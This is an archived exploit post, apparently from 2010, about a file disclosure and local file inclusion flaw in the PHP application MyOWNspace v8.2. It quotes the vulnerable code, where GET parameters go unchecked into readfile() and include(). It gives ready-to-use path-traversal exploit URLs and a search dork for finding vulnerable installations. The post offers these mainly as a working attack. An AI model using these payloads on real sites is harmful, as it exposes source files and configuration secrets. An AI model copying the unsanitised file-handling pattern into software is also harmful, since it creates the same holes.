MyOWNspace v8.2 local file include & File Disclosure Vulnerability

2010-06-12T00:00:00
ID 1337DAY-ID-12674
Type zdt
Reporter DarK c0d3r
Modified 2010-06-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==================================================================
MyOWNspace v8.2 local file include & File Disclosure Vulnerability
==================================================================


# Exploit Title: [MyOWNspace v8.2  local file include & File Disclosure Vulnerability]     
# Date: [2010-06-12]               
# Author: [DarK c0d3r]           
# Software Link: [http://sourceforge.net/project/platformdownload.php?group_id=174729]
# Version: [8.2]
# Platform / Tested on: [php]  -::TYPE
# category: [webapps/0day ]
# Code : [=======================================================================
MyOWNspace v8.2  local file include & File Disclosure Vulnerability
=======================================================================

===========================================================================
( #Topic    : MyOWNspace_v8.2
( #Bug type : local file include & File Disclosure Vulnerability
( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729
( #DorK     : " Nopyright 2006 MyOWNSpace.FR"

===========================================================================
( #Author : DarK c0d3r
( #Email  : [email protected]
( #Website: http://www.sa-hacker.com
( #Forum  : http://www.sa-hacker.com/vb/
( #discovered by : DarK c0d3r
 
=====================================================================
                        File Disclosure Vulnerability
=====================================================================						
getfeed.php
=====================================================================
 
$filename = $_GET['file'];   <===================== warning


// build file headers
header("content-type:text/xml;charset=utf-8");


// refer to file and exit
readfile("$filename");
exit(); 
---------------------------------------------------------------------------
classes/flash_mp3_player.23/extras/external_feeds/getfeed.php
---------------------------------------------------------------------------
 
$filename = $_GET['file'];


// build file headers
header("content-type:text/xml;charset=utf-8");


// refer to file and exit
readfile("$filename");
exit();
---------------------------------------------------------------------------
Exploit :

http://localhost/PATH/classes/flash_mp3_player/extras/external_feeds/getfeed.php?file=../../../../index.php
http://localhost/path/classes/flash_mp3_player.23/extras/external_feeds/getfeed.php?file=../../../../index.php
============================================================================
                              local file include
============================================================================
				myownad/index.php

if(isset($_GET['u'])) $conf_file="../myownad/config".$_GET['u'].".php";
else $conf_file="../myownad/config.php";
include($conf_file);

Exploit :

http://localhost/path/myownad/index.php?u=../../../index
=============================================================================]



#  0day.today [2018-03-10]  #